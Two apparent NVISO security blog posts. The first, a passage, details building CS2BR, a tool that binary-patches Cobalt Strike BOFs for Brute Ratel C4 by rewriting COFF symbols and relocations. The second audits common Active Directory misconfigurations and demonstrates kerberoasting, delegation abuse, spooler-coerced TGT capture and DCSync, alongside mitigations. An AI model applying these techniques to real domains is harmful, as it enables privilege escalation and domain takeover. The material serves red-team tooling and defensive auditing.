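        "name": name.rstrip(b"\0").decode(errors="replace"),
        "value": value,
        "section": section,        # 0 == IMAGE_SYM_UNDEFINED (external)
        "is_function": typ == 0x20,
        "is_external": scl == 2,   # IMAGE_SYM_CLASS_EXTERNAL
        "aux_records": n_aux,
    }

# bof.o's go: section 1 (.text), value 0, function, external storage class
record = struct.pack(SYM_FMT, b"go", 0, 1, 0x20, 2, 1)
print(parse_symbol(record))
```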

When we merge them using ld (ld --relocatable bof.o cs2br.o -o brbof.o --oformat pe-x86-64) and inspect them in a disassembler like Ghidra, we see that the linking worked as expected and cs2br.o‘s coffee actually calls bof.o‘s go:

Resolved go entrypoint in Ghidra

Nice, the first thing is done. This was pretty easy!

Thanks, stackoverflow!

Rewiring CS BOF API imports

In the previous section we declared go as an external symbol in cs2br.o‘s source code. This allowed us to have the linker resolve the reference to the supplied bof.o‘s implementation of go.

Rewiring the CS BOF API imports of bof.o to cs2br.o‘s implementations isn’t as straightforward though. Let’s have a look at the symbols involved:

$ objdump -x cs2br.o | grep BeaconPrintf
[ 24](sec  1)(fl 0x00)(ty   20)(scl   2) (nx 0) 0x00000000000005e1 BeaconPrintf

$ objdump -x bof.o | grep BeaconPrintf                                                
[ 18](sec  0)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000000 __imp_BeaconPrintf
0000000000000027 IMAGE_REL_AMD64_REL32  __imp_BeaconPrintf

From this output we learn that:

  • cs2br.o exports BeaconPrintf as a symbol that
    • is contained in section #1 (.text)
    • is a function (ty 20)
    • is at offset 0x5e1 into its section
  • bof.o exports __imp_BeaconPrintf as a symbol that
    • has the __imp_ prefix, indicating that this function was declared using __declspec(dllimport) and needs to be imported at runtime
    • is an external symbol (section value IMAGE_SYM_UNDEFINED)
    • is not a function (ty 0)
  • bof.o also references __imp_BeaconPrintf in a relocation in the .text section, which makes sense considering that BeaconPrintf is imported from the CS BOF API and its implementation is not included in the BOF’s source code.

The fact that __imp_BeaconPrintf refers to an import makes it special and trickier to handle:

Relative reference to pointer to BeaconPrintf
Pointer to BeaconPrintf

Contrary to how cs2br.o called go (which was a call to an address relative to the CALL instruction), bof.o calls BeaconPrintf by an absolute address that is read from the place in memory where __imp_BeaconPrintf is located. In other words, __imp_BeaconPrintf is a pointer to the actual implementation, and a loader needs to calculate and populate this address at runtime.

If we wanted to make the linker resolve these references in bof.o like it did with the go symbol in cs2br.o above, we would need cs2br.o to export not the function implementations but pointers to those implementations. Then we’d still need to rename all the imported functions in bof.o so they don’t have the __imp_ prefix in their names anymore or else a loader might attempt to import them again (and fail doing so).

There are two major challenges to this though:

  • How can we modify parts (such as symbols) of object files? The GNU utilities I found so far only allowed me to read but not write them.
  • How can we debug merged object files? When we just execute any merged BOF via a BRC4 badger, the badger might just not output anything (in the best case) or straight up crash on us (in the worst case).

I’ll cover those next before continuing with the process of merging object files.

This wouldn't work out.

IV. Getting the right tools for the job

As outlined above, there are two major challenges related to the tooling I needed to overcome at this point.

Reading/writing COFF: structex

There are lots of COFF parsers out there that allow you to parse existing or create new COFF files. Only very few also allow for modification of existing files though. Since I wanted to stick with Python for the tooling for this project and couldn’t find a suitable solution for my needs, I decided to implement this functionality based on a Python library I programmed in the past: structex.

The idea of structex is that, as a developer, you don’t imperatively write down code to serialize or deserialize individual fields of data structures but instead describe the data structure to your application. The library then does the heavy-lifting and figures out which field is at what offset and does all the (de-)serialization for you. Then you can just have your application map data structures to some binary buffer and access fields of those structures like you access fields in Python classes. Here’s a brief example:

class MachineType(IntEnum):
    IMAGE_FILE_MACHINE_I386 = 0x014c
    IMAGE_FILE_MACHINE_IA64 = 0x0200

class coff_file_header(Struct):
    # ...
    _machine: int = Primitive(uint16_t)
    NumberOfSections: int = Primitive(uint16_t)

    def Machine(self) -> MachineType:
        return MachineType(self._machine)

# Load BOF into memory & parse header
memory = BufferMemory.from_file('bof.o')
bof_header = coff_file_header(memory, 0)

bof_header.NumberOfSections = 0

# Write modified BOF back to disk
# bof_modified.o has now set its NumberOfSections to 0

All that I needed to do then was write down the data structures used in COFF, add some property decorators for even easier handling, and implement some bits of custom logic (e.g. reading & modifying the COFF string table). This allowed me to easily parse, inspect and modify any BOF files.
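To illustrate the declarative idea, here is a minimal stand-in I wrote; structex’s real API differs, and the class and field names are my own. A descriptor computes each field’s offset once at class-creation time, then (de)serializes against the backing buffer on every attribute access:

```python
import struct

class Primitive:
    """Descriptor that maps one fixed-size field to an offset in a buffer."""
    def __init__(self, fmt: str):
        self.fmt, self.size = fmt, struct.calcsize(fmt)
    def __set_name__(self, owner, name):
        self.offset = owner._size      # place the field at the running offset
        owner._size += self.size
    def __get__(self, obj, objtype=None):
        return struct.unpack_from(self.fmt, obj.buf, obj.base + self.offset)[0]
    def __set__(self, obj, value):
        struct.pack_into(self.fmt, obj.buf, obj.base + self.offset, value)

class Struct:
    _size = 0
    def __init__(self, buf: bytearray, base: int):
        self.buf, self.base = buf, base

class CoffFileHeader(Struct):
    _size = 0
    Machine = Primitive("<H")           # 0x8664 == AMD64
    NumberOfSections = Primitive("<H")

buf = bytearray(b"\x64\x86\x05\x00" + b"\x00" * 16)
hdr = CoffFileHeader(buf, 0)
print(hex(hdr.Machine), hdr.NumberOfSections)  # 0x8664 5
hdr.NumberOfSections = 0                       # writes through to the buffer
print(buf[2:4])                                # bytearray(b'\x00\x00')
```

The appeal of this design is that reads and writes go straight through to the underlying bytes, so modifying a parsed file and writing it back out requires no separate serialization step.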

Debugging BOFs: COFFLoader

Implants are mainly designed to operate covertly, leave very few traces, and avoid getting noticed (and for that matter, sometimes even actively evade detection). This can make them hard to locate, observe and make sense of – not exactly ideal conditions for debugging. So I went out looking for alternatives.

It’s safe to assume that any program that executes BOFs does that in a way that is somewhat similar to TrustedSec’s COFFLoader. So why not use COFFLoader then? Well, it doesn’t support BRC4’s BOF API. Considering that COFFLoader is open source and the BRC4 API is pretty limited (as shown in our first blog post TODO: Insert link), it wasn’t terribly difficult to implement that functionality. I basically only needed to

  • provide simple implementations of the BRC4 APIs,
  • update COFFLoader’s InternalFunctions array to point to the Badger* APIs,
  • update hardcoded uses of the length of InternalFunctions,
  • update the check for symbol prefixes to check for the Badger prefix and
  • update the signature and exact call of the BOF entrypoint.

Since I didn’t want to spend much time on this, I kept the implementations of the BRC4 APIs very simple and didn’t add any sanity checks (or even proper formatting):

size_t BadgerStrlen(CHAR* buf) { return strlen(buf); }
size_t BadgerWcslen(WCHAR* buf) { return wcslen(buf); }
void* BadgerMemcpy(void* dest, const void* src, size_t len) { return memcpy(dest, src, len); }
void* BadgerMemset(void* dest, int val, size_t len) { return memset(dest, val, len); }
int BadgerStrcmp(const char* p1, const char* p2) { return strcmp(p1, p2); }
int BadgerWcscmp(const wchar_t* s1, const wchar_t* s2) { return wcscmp(s1, s2); }
int BadgerAtoi(char* string) { return atoi(string); }
PVOID BadgerAlloc(SIZE_T length) { return malloc(length); }
VOID BadgerFree(PVOID* memptr) { free(*memptr); }
BOOL BadgerSetdebug() { return TRUE; }
ULONG BadgerGetBufferSize(PVOID buffer) { return 0; }

int BadgerDispatch(WCHAR** dispatch, const char* __format, ...) {
    va_list args;
    va_start(args, __format);
    vprintf(__format, args);
    va_end(args);
    return 0;
}

int BadgerDispatchW(WCHAR** dispatch, const WCHAR* __format, ...) {
    va_list args;
    va_start(args, __format);
    vwprintf(__format, args);
    va_end(args);
    return 0;
}

I’m not very familiar with using gdb for debugging and do most of my coding in Visual Studio and Visual Studio Code and debugging in x64dbg. That’s why I also used this opportunity to set up COFFLoader as a Visual Studio solution. Now I could use COFFLoader to run my BOFs and Visual Studio and x64dbg to debug both COFFLoader and my CS2BR BOFs, neat!

Compiling & debugging in Visual Studio

V. Finally: The CS2BR Binary Patching Workflow

RE: Rewiring CS BOF APIs

On the matter of actually rewiring CS BOF API imports, there are two things to consider:

  1. The relocations to the imports themselves are relative to the instruction using/calling them.
  2. The imports referenced by the code are pointers to the actual implementations.

Writing this, I realize that all of this sounds pretty abstract, so let’s have a look at an example:

Our bof.o sends text back to operators by using the BeaconPrintf API. Because of that, bof.o imports the API by defining a __imp_BeaconPrintf symbol. This symbol refers to a place in memory where a pointer to the actual BeaconPrintf is stored.

For binary patching in CS2BR, this means that we somehow need to overwrite these pointers in bof.o so that they point to CS2BR’s methods. These pointers are set by the loader (e.g. COFFLoader) though, and that’s something we can’t control before or even at compile-time. So the question becomes: how can we make the loader point imports to CS2BR’s methods instead?

After staring at Ghidra, x64dbg, objdump output and my Python source code for more days than I’m comfortable admitting, I worked out a solution to this problem. It consists of some preparations and two processing phases that I’ll detail in the following paragraphs.

The general idea is pretty simple:

CS2BR binary patching

CS2BR defines pointers (prefixed with __cs2br_) to its compatibility layer’s methods. These pointers also end up in its symbol table. After merging both object files, the __imp_ symbols referencing CS BOF APIs (which originated from bof.o) are replaced with the __cs2br_ symbols (provided by cs2br.o). This leaves us with symbols that are referenced relative to instructions and contain pointers to our desired CS2BR compatibility layer methods.

Here’s how the complete workflow is implemented in CS2BR:

1. Declaring the go entrypoint

As described earlier in this blog post, the compiled CS2BR object file needs to contain an external reference to the go entrypoint. To do so, I just added a declaration of this method to CS2BR’s stub: extern void go(void *, int);

This will make ld correctly resolve this symbol to the BOF’s entrypoint when we merge both object files.

2. Creating proxy symbols

Next, I added pointers to all of the CS BOF APIs implemented in CS2BR’s compatibility layer:

void* __cs2br_BeaconDataParse __attribute__((section(".data"))) = &BeaconDataParse;
void* __cs2br_BeaconDataInt __attribute__((section(".data"))) = &BeaconDataInt;
void* __cs2br_BeaconDataShort __attribute__((section(".data"))) = &BeaconDataShort;
// ...

3. Preprocessing the BOF

Before merging object files, CS2BR identifies all CS BOF API import symbols (named __imp_Beacon*) and reconfigures them:

for symbol_name in cs_patches:
  symbol = osrcbof.get_symbol_by_name(f"__imp_{symbol_name}")
  symbol.Value = 0
  symbol.SectionNumber = 0
  symbol.StorageClass = StorageClassType.IMAGE_SYM_CLASS_EXTERNAL
  symbol.Name = f"__cs2br_{symbol_name}"
  symbol._type = 0

This reconfiguration ensures that the symbols are

  • treated as external (section number 0, storage class IMAGE_SYM_CLASS_EXTERNAL, type 0) and
  • renamed from __imp_* to __cs2br_*, which allows ld to resolve them to cs2br.o‘s defined symbols upon merging.

Then CS2BR renames the symbols of Windows APIs that are available to CS BOFs by default (LoadLibrary, GetModuleHandle, GetProcAddress and FreeLibrary) so they have the __imp_KERNEL32$ prefix. This ensures that, if any of those APIs are used by the BOF, BRC4 imports and links them before executing the BOF.

4. Merging both object files

Both object files (bof.o and cs2br.o) are merged using ld. The resulting object file contains the sections and symbols of both files.

5. Recalculating ADDR64 relocations

At this point, both COFFLoader and BRC4 should have been able to load and execute the patched BOF. Instead, COFFLoader just crashed and BRC4 gave me the silent treatment.

It turned out that the relocations were flawed and presumably not recalculated by ld. I’ll briefly describe that bug now; you can skip ahead to my workaround if you want to.

Broken relocations

Relocations are a tricky topic. In fact, I don’t think I’ve fully wrapped my head around them myself. When I tested my BOFs at that point and saw COFFLoader crashing, I did a lot of manual investigation by debugging COFFLoader and tracing back why it crashed. Let’s have a look at an example:

We’ll execute a very simple BOF that only formats and outputs a string using BeaconPrintf:

#include <windows.h>
#include "beacon.h"

VOID go(IN PCHAR Args,  IN ULONG Length) {
    BeaconPrintf(CALLBACK_OUTPUT, "Hi from CS2BR %i\n", 1337);
}
When executing the BOF in COFFLoader, it would end up executing some data, not actual instructions:

Silly COFFLoader executing data

Inspecting the address of RIP in the dump, we can see that RIP lies in the .rdata section of the BOF as we can clearly see the strings used in cs2br.o‘s entrypoint:

.rdata in x64dbg

By restarting and carefully stepping through the program we see that the coffee entrypoint is invoked correctly, so that bit works just fine:

Proof that our entrypoint works!

It also reaches the go entrypoint:

Proof that go is called

The next call will fail though. It retrieves the address of the method to call from a pointer (mov rax, qword ptr ds:[7ff45d050068]) and calls that. Taking a look at the memory dump of the address of the pointer, we see that this is our .data section:

Proof that the pointers are garbage

The 0xDEADBEEFDEADBEEF is a dummy value I made COFFLoader pass to the coffee entrypoint to use as the _dispatch variable. CS2BR saves this _dispatch variable as a global variable in .data, as can be seen in the objdump output:

$ objdump -x minimal.BR_bin21.o | grep "sec  3"

[ 36](sec  3)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .data
[ 42](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000068 __cs2br_BeaconPrintf
[ 43](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000050 __cs2br_BeaconFormatPrintf
[ 44](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000088 __cs2br_BeaconIsAdmin
[ 45](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000000 _dispatch
[ 46](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000070 __cs2br_BeaconOutput
[ 47](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0)

As expected, the call fails at this point as it jumps to 0x00007FF45D0705E1 which is just some random offset into a method:

Broken relocations jumping into random functions

It should be pointing to 0x00007FF45D070621 though, as the .text section is mapped to 0x00007FF45D070000 and BeaconPrintf‘s offset into this section is 0x621. Apparently, the value of the pointer to BeaconPrintf is a whopping 0x40 bytes short. This left me confused for quite a while. And just by accident, I noticed something in the objdump output:

Idx Name          Size      VMA               LMA               File off  Algn
  0 .text         00000dc0  0000000000000000  0000000000000000  000000b4  2**4
  5 .data         00000200  0000000000000000  0000000000000000  00001380  2**5
                  CONTENTS, ALLOC, LOAD, RELOC, DATA

[  2](sec  1)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .text
[ 28](sec  1)(fl 0x00)(ty   20)(scl   2) (nx 0) 0x0000000000000621 BeaconPrintf
[ 34](sec  1)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000040 .text
[ 42](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000068 __cs2br_BeaconPrintf

OFFSET           TYPE              VALUE
0000000000000027 IMAGE_REL_AMD64_REL32  __cs2br_BeaconPrintf-0x0000000000000068

OFFSET           TYPE              VALUE
0000000000000068 IMAGE_REL_AMD64_ADDR64  .text-0x0000000000000040

Did you spot it? There are two .text symbols, of which one has an offset of 0x40 into the .text section. That same odd symbol is used in relocations of the __cs2br_* symbols.

The ADDR64 relocations for the entries in .data could be read as: “Read the relocation’s current value from its offset into .data (aka its ‘addend’), add to it the absolute address of the .text-0x40 symbol, and write the calculated sum back at the relocation entry’s offset in .data.” This doesn’t quite work though: these relocations aren’t relative to a symbol but to the section their symbols reside in. Thus, COFFLoader correctly resolves the relocation to the address of the .text section plus the relocation’s addend 0x5e1. We know the relocation’s addend is 0x5e1 by simply extracting it:

# 5096 is the decimal representation of 1380h (.data offset into the file) + 68h (relocation offset)
od -j 5096 -N 8 -t x8 minimal.BR_bin.o
0011750 00000000000005e1

Here’s where the workaround finally comes into play!

(Cont:) 5. Rebasing ADDR64 relocations

Lastly, CS2BR recalculates relocations that

  • are of type IMAGE_REL_AMD64_ADDR64 and
  • are associated to a symbol that doesn’t refer to a section but to an offset within a section (e.g. .text-0x40).

For each of those relocations, it will acquire their current addend, add to it the value of the associated symbol, and write the newly calculated addend back to the image, as can be seen here with the __cs2br_BeaconPrintf symbol:

[INFO] Pointing relocation .data:0x68 from .text:0x40+0x5e1 (=> __cs2br_BeaconPrintf) to .text:0x621 (=> BeaconPrintf)...
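The rebase step above boils down to one read-modify-write of the 64-bit addend. Here is a hedged sketch of mine (illustrative names, not CS2BR’s actual code) using the numbers from the BeaconPrintf example, where the aliased section symbol .text-0x40 has a Value of 0x40:

```python
import struct

def rebase_addr64(section_data: bytearray, reloc_offset: int, symbol_value: int) -> None:
    # Fold the aliased section symbol's Value into the stored 64-bit addend,
    # so the loader's section-relative resolution lands on the right target.
    addend = struct.unpack_from("<Q", section_data, reloc_offset)[0]
    struct.pack_into("<Q", section_data, reloc_offset, addend + symbol_value)

data = bytearray(0x80)
struct.pack_into("<Q", data, 0x68, 0x5E1)  # old addend: offset into the aliased .text
rebase_addr64(data, 0x68, 0x40)            # Value of the ".text-0x40" symbol
print(hex(struct.unpack_from("<Q", data, 0x68)[0]))  # 0x621, BeaconPrintf's true offset
```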

VI. Demo

Patching a BOF using CS2BR is very simple. One only needs to compile the compatibility layer (cs2br.o) and run the script, supplying paths to the BOF to patch and to cs2br.o:

CS2BR Binary Patcher

Running a BOF that was binary-patched by CS2BR works great in COFFLoader:

COFFLoader runs our patched BOFs!

Not so much in BRC4 though:

BRC4 doesn't

At this point, there wasn’t much I could do. I certainly didn’t feel like putting more work into it and testing against a black box didn’t make much sense.

That's it.

I did reach out to Chetan Nayak, the developer of BRC4, via Discord a couple of times during the project. Since this was an internal project at the time however, I couldn’t share CS2BR’s source code. Provided with a fully patched binary, they said the entrypoint was not found and never executed by the badger. Apparently, debugging this blob could take a lot of time and they can’t provide support for such BOFs.

This marks the end of my work on this project – for now.

VII. Conclusion & Outlook

This was one long blog post to write. Working on the tool and debugging BOFs certainly took a long time – I honestly underestimated the effort of documenting all of it in this post though. So, let’s have a look at what CS2BR accomplished:

CS2BR’s source-code patching approach works very well and enables operators to use well-known and battle-tested BOFs, formerly (almost) exclusive to CS, in BRC4. While it requires access to source code and recompilation of BOFs, it does provide a solid compatibility layer.

In its current iteration, CS2BR is able to patch binary CS BOFs and make them (on paper!) compatible with BRC4. It works well in a modified COFFLoader that provides a simple BRC4 BOF API but doesn’t seem to work with BRC4’s badgers. Why it doesn’t remains a mystery to me. As such, this iteration of CS2BR effectively isn’t usable. Since this is an open-source project, everyone is free to have a look for themselves, and maybe someone finds a solution – in which case I would be thrilled to learn all about it!

Both approaches, the source-code and binary patching, make use of the same custom entrypoint which, depending on the exact BOF being executed, requires encoding input parameters with the provided Python script. It would be nice to automate parts of this by parsing the CNA scripts that accompany the BOFs and making use of the BRC4 Ratel Server API to simplify the process.


To me, this project was a rewarding, albeit intense and at times frustrating, journey and deep-dive into BOF development and the COFF format. I certainly learned a lot! To be frank though, the fact that this isn’t a success-story leaves me quite unsatisfied.

I’ll be setting this project aside for now and will keep supporting the source-code patching approach. Maybe some day Chetan finds the time to look into his BOF loader and lets me know what’s wrong with CS2BR’s approach to patching.

Since you made it this far, I can only assume that you are very interested in the topic (or skipped a fair bunch of this blogpost). I would love to know your thoughts on the topic, so please leave a reply!

Moritz Thomas

Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

Most common Active Directory misconfigurations and default settings that put your organization at risk


In this blog post, we will go over the most recurring (and critical) findings that we discovered when auditing the Active Directory environment of different companies, explain why these configurations can be dangerous, how they can be abused by attackers and how they can be mitigated or remediated.

First, let’s start with a small introduction on what Active Directory is.
Active Directory (AD) is a service that allows organizations to manage users, computers and other resources within a network. It centralizes authentication and authorization mechanisms for Windows devices and applications, making it easier for administrators to control access to network resources, enforce security policies, manage device configuration, etc.

Setting up an AD environment can be as simple or as complex as the organization’s size and requirements dictate. In any case, AD comes with default settings and configurations that can be considered dangerous and that may not comply with the security policies of your company. Administrators should be aware of these default configurations and take action to secure their environment by implementing best practices and security measures that align with their organization’s needs and risk appetite.

However, it may be difficult to identify these insecure configurations as they are not always well known to administrators. Moreover, new vulnerabilities may be identified later, as in the case of Active Directory Certificate Services (ADCS) where default templates can be abused to escalate privileges.

In the past two years, we reviewed AD environments of about 40 companies. When reviewing these environments, we noticed that some findings were quite recurrent. Some of these misconfigurations (or default settings) can have a significant impact on the security posture of a company and allow attackers to gain access to privileged accounts or to compromise the entire domain.

Let’s look at the 6 most common misconfigurations that could be abused by attackers to gain access to other systems or to compromise the environment.


Administrator accounts are allowed for delegation

In Active Directory, accounts can be delegated by default. This means that an application can act on behalf of a user (Kerberos delegation), impersonate a user anywhere within the forest (unconstrained delegation), or only impersonate the user to a specific service on a specific computer (constrained delegation).

If a delegation has been configured and if an attacker has access to the delegated system or account, they could try to impersonate an administrator account and move laterally or compromise the domain.

We found that, in almost all organizations audited, there was at least one privileged account for which the “This account is sensitive and cannot be delegated” setting was not enabled.

To abuse this default configuration, we first need to enumerate delegations. This can be done by using the Active Directory PowerShell module:

Get-ADUser -LdapFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=16777216)(msDS-AllowedToDelegateTo=*))"
Figure 1: Output of the above command

Thanks to the above command, we know that a constrained delegation has been configured on the IIS account. We can now check the other properties of the IIS account:

Get-ADUser iis -Properties msDS-AllowedToDelegateTo
Figure 2: Output of the Get-ADUser iis -Properties msDS-AllowedToDelegateTo command

In this case, we can see that a constrained delegation has been configured on the IIS account to access the CIFS service of the WinServ-2022 server (Figure 2).

If we try to access the server using our low-privileged account, Bob, we get an error (Figure 3). This is expected because our account is not allowed to access this server.

Figure 3: Error message when trying to access the WinServ-2022 server with Bob

As the IIS account is a service account, we can try to kerberoast it using Rubeus, for example (Figure 4). A kerberoasting attack is a technique that attempts to retrieve the password hash of an Active Directory account that has a Service Principal Name (also known as a service account). Note that in this example, we use the “rc4opsec” argument to only kerberoast service accounts that support RC4 encryption, which is the default setting (we will go into more detail in the “AES encryption not enforced on service accounts” section).

Figure 4: Kerberoasting of the IIS account

In this case, we were able to get the hash of the IIS account and crack the password, “Password123”, using “John the Ripper”.

Figure 5: Generating the AES256 hash of the password

After generating the AES256 representation of the password, we can now use Rubeus to request an HTTP ticket to impersonate the domain administrator and gain access to the WinServ-2022 system. In this example, the HTTP ticket will allow us to run commands on the WinServ-2022 server:

Figure 6: Generating an HTTP ticket to impersonate the domain Administrator and gain access to WinServ-2022

As mentioned before, we are allowed to impersonate the Administrator account because the “This account is sensitive and cannot be delegated” setting is not enforced by default.

After requesting and injecting the ticket that is used to impersonate the Administrator account in memory, we can access WinServ-2022 with the Administrator account:

Figure 7: Accessing WinServ-2022 and running commands as the Domain Administrator

This demonstrates that by compromising a poorly configured service account, any user can gain access to another system with domain administrator privileges. This could have been avoided by enabling the “This account is sensitive and cannot be delegated” setting on privileged accounts (e.g., Domain Admins, etc.), because the Administrator credentials would not be forwarded to another computer for authentication purposes.

The following dsquery command can be used to identify any user where the setting is not enabled:

dsquery * DC=LAB,DC=LOCAL -filter "(&(objectclass=user)(objectcategory=person)(!useraccountcontrol:1.2.840.113556.1.4.803:=1048576))"
Figure 8: Output of the dsquery command
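The magic numbers in the two LDAP filters above are userAccountControl bits. As an illustrative decoder of my own (not part of the audit tooling; the function name is hypothetical), checking an account’s risk is a simple bitwise test:

```python
# Flag values from the userAccountControl documentation:
UF_NOT_DELEGATED = 0x100000                    # 1048576: "This account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # 16777216: constrained delegation with protocol transition

def can_be_delegated(user_account_control: int) -> bool:
    """True if the protective flag is NOT set, i.e. the account is at risk."""
    return not (user_account_control & UF_NOT_DELEGATED)

print(can_be_delegated(0x200))                     # NORMAL_ACCOUNT only -> True
print(can_be_delegated(0x200 | UF_NOT_DELEGATED))  # flag enabled -> False
```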

In this example, if this setting was enabled, the attacker would not have been able to gain access to WinServ-2022 as Administrator:

Figure 9: Enabling the flag for the Administrator account
Figure 10: The attack fails when the flag is enabled

Another option is to add the accounts to the Protected Users group, introduced in Windows Server 2012 R2. The goal of this group is to protect administrators against credential theft by not caching credentials in insecure ways. Adding accounts to this group will not only prevent any type of Kerberos delegation, but will also prevent:

  • CredSSP and WDigest from being used;
  • NTLM authentication;
  • Kerberos from using RC4 or DES keys;
  • Renewal of TGT beyond a 4-hour lifetime.

Microsoft recommends adding a few users to this group first to avoid locking out all administrators in case of a problem. However, adding computer and service accounts to this group is pointless because their credentials will always be present on the host machine.

Note that after adding administrators to this group, some organizations have experienced difficulties connecting to servers using RDP (Remote Desktop Protocol). This is because only the Fully Qualified Domain Name (FQDN) is supported when connecting to servers via RDP once the user has been added to the Protected Users group: when an IP address is used, NTLM authentication is attempted instead of Kerberos, whereas the FQDN allows Kerberos authentication to be used.

AES encryption not enforced on service accounts

When a user requests access to a service in Active Directory, a service ticket is created. This service ticket is encrypted using a specific encryption type and sent to the user. The user can then present this encrypted ticket to the server to access the service. There are different encryption types available, such as DES, RC4 and AES. The encryption type is defined by the msDS-SupportedEncryptionTypes attribute. By default, the attribute is not set and the domain controller will encrypt the ticket with RC4 to ensure compatibility. This could allow an attacker to perform a kerberoasting attack, as previously demonstrated.

This means that if AES encryption is not enabled on service accounts and RC4 is not specifically disabled, an attacker could try to request a Kerberos ticket for a specific SPN (Service Principal Name, which is used to associate a service to a specific account) and brute force its password. Then, if someone can retrieve the cleartext password, they will be able to impersonate the account and access all systems/assets to which the service account has access.

If weak encryption types are allowed, an attacker can try to kerberoast a service account without generating too much suspicious activity in the logs, and gain access to other systems within the environment as described above in the “Administrator accounts are allowed for delegation” section.

To identify the value of the msDS-SupportedEncryptionTypes attribute for all service accounts, the following dsquery command can be used:

dsquery * "DC=lab,DC=local" -filter "(&(objectcategory=user)(servicePrincipalName=*))" -attr msDS-SupportedEncryptionTypes samaccountname distinguishedName -limit 0 | FIND /i /v "KRBTGT" | SORT

It is important to note that if the value is blank or equal to 0, it will be interpreted as RC4_HMAC_MD5.

The msDS-SupportedEncryptionTypes attribute on service accounts should be modified to only allow AES instead of legacy protocols such as RC4 or DES. However, for backward compatibility or to validate that everything is functional, the value of the attribute can be set to 28. This means that RC4, AES-128, and AES-256 will be allowed. Note that all clients should support AES encryption unless they are running Windows 2000, Windows XP or Windows Server 2003.

Finally, after making sure everything is working as expected, the value can be modified to 24 to only allow AES-128 and AES-256, as shown on the following screenshot (Figure 11), or to 16 to only allow AES-256.
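To make these values easier to interpret, the attribute can be decoded as a bit mask. The following sketch uses the Kerberos encryption-type flag values documented by Microsoft (0x4 RC4, 0x8 AES-128, 0x10 AES-256, plus the deprecated DES types):

```python
# Bit flags of the msDS-SupportedEncryptionTypes attribute.
ENC_FLAGS = {
    0x01: "DES_CBC_CRC",
    0x02: "DES_CBC_MD5",
    0x04: "RC4_HMAC_MD5",
    0x08: "AES128_CTS_HMAC_SHA1_96",
    0x10: "AES256_CTS_HMAC_SHA1_96",
}

def decode_enc_types(value: int) -> list:
    """Decode msDS-SupportedEncryptionTypes; a blank or 0 value is
    interpreted as RC4_HMAC_MD5, as noted above."""
    if not value:
        return ["RC4_HMAC_MD5 (default)"]
    return [name for flag, name in ENC_FLAGS.items() if value & flag]

print(decode_enc_types(28))  # RC4 + AES-128 + AES-256
print(decode_enc_types(16))  # AES-256 only
```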

Figure 11: Output of the dsquery command

Alternatively, you can edit the options of the account and check the following boxes (Figure 12). This will update the msDS-SupportedEncryptionTypes attribute.

Figure 12: Editing the account options to support Kerberos AES 128 and 256 encryption

If the attribute was set to 16 (meaning that only AES-256 is supported), we would not have been able to kerberoast the IIS account using the rc4opsec argument, as shown in Figure 13.

Figure 13: Comparison when the msDS-SupportedEncryptionTypes is set and not set

Moreover, if the rc4opsec argument is not used and the service account only allows AES encryption types, a 4769 event will be generated on the domain controller with the encryption type used (Figure 14). In this case, the encryption type is 0x12 (DES_CBC_MD5 and AES 256) which is not expected as the attribute is set to 0x10 (only AES-256).

Figure 14: Log showing the encryption type used

A Blue team can use these events to identify kerberoasting activities on service accounts.

Finally, deprecated and insecure encryption types can be disabled via a GPO, as follows:

Figure 15: GPO allowing the secure encryption types and disabling the deprecated and insecure ones

If an attacker tries to request an RC4 ticket for an account where only AES encryption types are allowed, the kerberoast attack will fail:

Figure 16: Kerberoast attack failing when the account only supports AES encryption types

Note that the /usetgtdeleg parameter is used to request an RC4 ticket for AES accounts.

Print spooler is enabled on Domain Controllers

According to Microsoft, the print spooler is an executable that manages the printing process by retrieving the location of the correct printer driver, loading the driver, scheduling the print job, etc.

In the past few years, the print spooler service has been affected by several zero-day vulnerabilities (such as PrintNightmare) allowing low-privileged users to escalate their privileges, as the service runs with system-level privileges. Many exploits are available, but we will not focus on these vulnerabilities.

The print spooler service can also be abused to gain access to the keys to the kingdom: the hash of the KRBTGT account. By gaining access to the hash of this account, attackers will be able to forge Golden Tickets, meaning that they will gain almost unlimited access to the Active Directory domain (domain controllers, devices, files, etc.). An attacker can also perform a Skeleton Key attack to create persistence in the domain, for example. This malware injects itself into the LSASS process and creates a master password that will work for any account in the domain.

Indeed, when an unconstrained delegation has been configured on a server and when the print spooler service is running on at least one domain controller, it is possible to get the credentials of the domain controller where the service is running.

During our audits, we identified that more than 25% of organizations had configured unconstrained delegation on one or multiple machine accounts. In addition, the print spooler service was running on at least one domain controller in 75% of organizations.

Let’s see how an attacker could abuse these dangerous configurations.

First, we must find where an unconstrained delegation has been configured. This can be done using the Get-DomainComputer command from PowerView as follows:

Figure 17: List of computers where an unconstrained delegation has been configured

Note that unconstrained delegation is enabled by default and required on domain controllers. In this example, WIN-7I6M16HF63I is the Domain Controller (DC).

We have already compromised the WinServ-2022 server where an unconstrained delegation has been configured. Moreover, the print spooler service is running by default on domain controllers. All the conditions are met to try to retrieve the hash of the KRBTGT account, so let’s give it a try!

We can use Rubeus on WinServ-2022 to extract all Ticket Granting Tickets (TGTs) and display any newly captured TGTs:

Figure 18: Using Rubeus to extract all captured TGTs

On our low privilege machine, we can use MS-RPRN, as an example, to force the domain controller to connect to WinServ-2022.

Figure 19: Forcing the DC to authenticate to WinServ-2022

As expected, we captured a new TGT (Figure 20). The response from the DC contains the domain controller’s computer account Kerberos ticket.

Figure 20: Capturing the TGT from the DC using Rubeus

We can now import this TGT to impersonate the DC:

Figure 21: Importing the TGT to impersonate the DC

Once the ticket has been imported, we can perform a DCSync attack using SharpKatz to get the KRBTGT hash.

Figure 22: DCSync attack using SharpKatz

